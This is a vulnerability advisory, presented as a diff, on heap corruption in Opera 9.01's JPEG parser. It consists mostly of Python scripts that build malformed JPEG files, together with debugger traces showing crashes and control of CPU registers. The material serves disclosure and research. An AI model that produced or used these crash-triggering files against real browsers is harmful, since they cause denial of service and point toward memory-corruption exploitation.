Note, that we also overwrite the JPEG end -marker FF D9. - -After executing this JPEG file with Opera, Opera immediatly allocates memory -until the max page size value is reached, but it doesn't stop. - -Note that some third party applications could also crash during this process, -in my case Antivir crashed with a "read memory" error. - - -# File: pavarotti.py -# ATTENTION, THIS COULD DAMAGE YOUR RUNNING SYSTEM! -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x41, - 0x41, 0x41, 0x41, 0x03, 0x41, 0x41, 0x41, 0x41, 0x11, 0x41, 0x41, 0x41, 0x41, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xFF, - 0xDA, 0x00, 0x0C, 0x01, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x11, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41] - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python pavarotti.py -pavarotti.py.jpg created! (637 bytes) -F:\vulndev\Opera> opera pavarotti.py.jpg - - -As said, this could be also interesting on mobile phones with Opera Mini. The -user has no real control to kill the Opera process, which should result in a -phone reboot. This was not tested. - - - ************************************************** - - -Further vulnerabilities ------------------------ - -The arrows mark the components whose datatypes are not properly validated by -Opera. - - -Segment: Start Of Frame (SOF) - -SOF: FF C0 -Length: 00 11 -Strictness: 08 -Image Hori.: 00 01 -Image Vert.: 00 01 -Components: 03 -Data of component: - - component number: 01 - - 4Bit hori., 4Bit vert., sample factor: 22 - - Number of quantisation table: 00 <- - - - component number: 02 - - 4Bit hori., 4Bit vert., sample factor: 11 - - Number of quantisation table: 01 <- - - - component number: 03 - - 4Bit hori., 4Bit vert., sample factor: 11 - - Number of quantisation table: 01 <- - - -The item "Number of quantisation table" of the first component is changed to -FFh in the below file. 
- - -# File: sof-quanttable.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - - 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0xFF, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) 
-f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python sof-quanttable.py -sof-quanttable.py.jpg created! (304 bytes) -F:\vulndev\Opera> - - -(ntdll) -7C9211D5 mov eax, dword ptr ds:[esi+C] -7C9211D8 mov dword ptr ss:[ebp-98], eax -7C9211DE mov edx, dword ptr ds:[eax] ; <-- CRASH - -EAX 01010101 -ECX 00EB2780 -EDX 00930178 -EBX 00930000 -ESP 0012EC94 -EBP 0012EEB4 -ESI 00EB2778 -EDI 01010101 -EIP 7C9211DE ntdll.7C9211DE - ----- - -Segment: Start Of Scan (SOS) - -SOS: FF DA -Length: 00 0C -Components: 03 -Data of component: - - component number: 01 - - 4Bit DC table, 4Bit AC table: 00 <- - - - component number: 02 - - 4Bit DC table, 4Bit AC table: 11 <- - - - component number: 03 - - 4Bit DC table, 4Bit AC table: 11 <- - - -The item "4Bit DC table, 4Bit AC table" of the first component is changed to -FFh in the below file. - -# File: sos-dcactable.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, - 0xFF, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python sos-dcactable.py -sos-dcactable.py.jpg created! 
(304 bytes) -F:\vulndev\Opera> - - -67AEE715 push ebp -67AEE716 mov ebp, esp -67AEE718 push esi -67AEE719 mov esi, ecx -67AEE71B cmp dword ptr ds:[esi+48], 8 -67AEE71F jge short Opera_12.67AEE733 -67AEE721 push dword ptr ss:[ebp+8] -67AEE724 call Opera_12.67AEE7FE -67AEE729 cmp dword ptr ds:[esi+48], 8 -67AEE72D jge short Opera_12.67AEE733 -67AEE72F push 1 -67AEE731 jmp short Opera_12.67AEE75E -67AEE733 mov eax, dword ptr ds:[esi+44] ; ds=B3001F00 (end part of jpeg file) -67AEE736 mov ecx, dword ptr ds:[esi+24] -67AEE739 shr eax, 18 -67AEE73C add eax, ecx ; -67AEE73E movzx ecx, byte ptr ds:[eax+60] ; <-- CRASH - -EAX 000000B2 -ECX FFFFFFFF -EDX 00EE2534 -EBX 00000005 -ESP 0012ECB0 -EBP 0012ECB4 -ESI 00EE2534 -EDI 00EE2534 -EIP 67AEE73E Opera_12.67AEE73E - - - ************************************************** - -# milw0rm.com [2007-01-08] +Opera JPEG processing - Heap corruption vulnerabilities +======================================================= +Date..: 8th September 2006 + 31th October 2006 (update) + 3rd November 2006 (update) + 5th January 2007 (public release) + +http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=457 + +Author: posidron + +Application: Opera 9.01 Build 8552 +Environment: Windows XP Professional, Service Pack 2 - DE + + +Preamble +======== + +Opera is vulnerable in parsing the JPEG file format. Discovered were four +vulnerabilities, each in different segments of the file format. I will +describe in this advisory the two important ones. + +1 - ntdll.RtlAllocateHeap() DHT vulnerability +2 - ntdll.RtlAllocateHeap() SOS vulnerability + +Opera Mini for mobile phones could be vulnerable also. The second bug looks +very interesting to this topic. + + +Details +======= + +The following code produces the sample image on which all further operations +are made. It's a valid image which was generated with Adobe Photoshop. 
+ +Properties +---------- + + Type : JPEG + Size : 1px x 1px + Compression: Low + Colors: : None + Filesize : 304 bytes + + +# File: sample.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 
0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python sample.py +sample.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + + ************************************************** + + +Details - ntdll.RtlAllocateHeap() DHT vulnerability +--------------------------------------------------- + +Segment: Define Huffman Table (DHT) + +DHT..................: FF C4 +Length...............: 00 4B +Index................: 00 +Number of codes......: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 +Sum of previous bytes: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + +We change the above to the below: + +Number of codes......: 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Sum of previous bytes: 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + + +# File: heap.py +bytes = [ + 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, + 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, + 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, + 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, + 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, + 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, + 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, + 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, + 0x20, 0x26, 0x18, 
0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, + 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, + 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, + 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, + + 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + + 0xFF, + 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, + 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] + +f = open(__file__+".jpg", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print __file__+".jpg created! (%d bytes)" % len(bytes) +# eof + +F:\vulndev\Opera> python heap.py +heap.py.jpg created! (304 bytes) +F:\vulndev\Opera> + + + +Analyse - ntdll.RtlAllocateHeap() DHT vulnerability +--------------------------------------------------- + +The call stack is very large, I think here is a good place to start: + +74E5D637 call dword ptr ds:[eax+4] ; set hardware bp on execution + +it's the 6th function from the top of the "crash" call stack. Restart Olly, +press F9 until Opera shows up again. + +Hit F7 until: + +74E610B6 mov bl, byte ptr ds:[eax+1] ; set hardware bp on execution + +Hit F9 until the following shows up in the panel, at this statement: + +ds:[543502E9]=C4 ('Ä') +bl=00 + +That's the marker of the "Define Huffman Table" segment. 
+Go on with F9, you will reach again: + +call dword ptr ds:[eax+4] + +Hit again F9, Opera shows up, drag the image into Opera. +You will reach again: + +call dword ptr ds:[eax+4] + +Hit F9 until you reached: + +74E610B6 mov bl, byte ptr ds:[eax+1] + +Hit F9 until the following shows up in the panel, at this statement: + +ds:[543502E9]=C4 ('Ä') +bl=00 + +Hit F7 to continue. + +74E5D735 push ebp +74E5D736 mov ebp, esp +... +74E5D750 mov dh, byte ptr ds:[eax+2] ; user input +74E5D753 mov dl, byte ptr ds:[eax+3] ; user input +74E5D756 lea edi, dword ptr ds:[edx+2] +74E5D759 cmp ecx, edi +74E5D75B jnb short Opera_1.74E5D765 + +First bytes of this marker are readed in there. + +Go on.. + +74E5D7C2 mov dl, byte ptr ds:[eax+ecx] ; read eax + n +74E5D7C5 mov byte ptr ss:[ebp+ecx-40], dl ; new location +74E5D7C9 movzx edx, dl +74E5D7CC add ebx, edx +74E5D7CE inc ecx ; n+=1 +74E5D7CF cmp ecx, 10 ; until n > 16 +74E5D7D2 jb short Opera_1.74E5D7C2 +74E5D7D4 lea eax, dword ptr ds:[ebx+1] +74E5D7D7 mov dword ptr ss:[ebp-18], ebx +74E5D7DA push eax +74E5D7DB call Opera_1.751E8B75 ; Opera allocation function + +Several operations are made here, single stepping might be interesting, +to follow the read-in process. + +74E5D7E0 mov edi, eax +74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] +74E5D7E5 push eax +74E5D7E6 mov dword ptr ss:[ebp-1C], edi +74E5D7E0 mov edi, eax +74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] +74E5D7E5 push eax +74E5D7E6 mov dword ptr ss:[ebp-1C], edi +74E5D7E9 call Opera_1.751E8B75 ; Opera allocation function + +If you return here, the last procedures are made. 
+ +74E5D8A7 mov eax, dword ptr ss:[ebp-18] +74E5D8AA add eax, 260 ; new allocation size +74E5D8AF push eax +74E5D8B0 call Opera_1.751E8B75 ; Opera allocation function + + 76709E57 push esi ; Size + 76709E58 push 0 ; Flags + 76709E5A push dword ptr ds:[768268C0] ; Handle + 76709E60 call dword ptr ds:[7671C1C0] ; ntdll.RtlAllocateHeap + + 6BB01414 lea edx, dword ptr ds:[esi+8] ; our "string" + 6BB01417 mov dword ptr ss:[ebp-10C], edx + 6BB0141D mov eax, dword ptr ds:[edx] + 6BB0141F mov dword ptr ss:[ebp-16C], eax + 6BB01425 mov ecx, dword ptr ds:[edx+4] + 6BB01428 mov dword ptr ss:[ebp-114], ecx + 6BB0142E mov edi, dword ptr ds:[ecx] ; ds:[41414141]=??? + + +Access violation when reading [41414141] + +EAX 41414141 +ECX 41414141 +EDX 5C9C9348 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +EBX 59110000 +ESP 578DEB6C +EBP 578DED8C +ESI 5C9C9340 +EDI 0000004F +EIP 3D3D142E ntdll.3D3D142E + +At this point we are able to control 4 bytes of EAX and ECX with two bytes, +defined in the JPEG file. +Somebody with a better understanding of the "Define Huffman Table" segment +can probably do more. There are several other issues in parsing this segment. +These routines are very nested and big, it would be a very time-consuming +research. + + + ************************************************** + + +Details - ntdll.RtlAllocateHeap() SOS vulnerability +--------------------------------------------------- + +The arrows mark the components whose datatypes are not properly validated by +Opera. This can lead to unexpected vulnerabilities depending on the function +flow. + +Segment: Start Of Scan (SOS) + +SOS: FF DA +Length: 00 0C +Components: 03 +Data of component: + - component number: 01 + - 4Bit DC table, 4Bit AC table: 00 + + - component number: 02 + - 4Bit DC table, 4Bit AC table: 11 + + - component number: 03 + - 4Bit DC table, 4Bit AC table: 11 + +In the next example we set the value of "Components" to 01, we also overwrite +the end of file with dump bytes. 
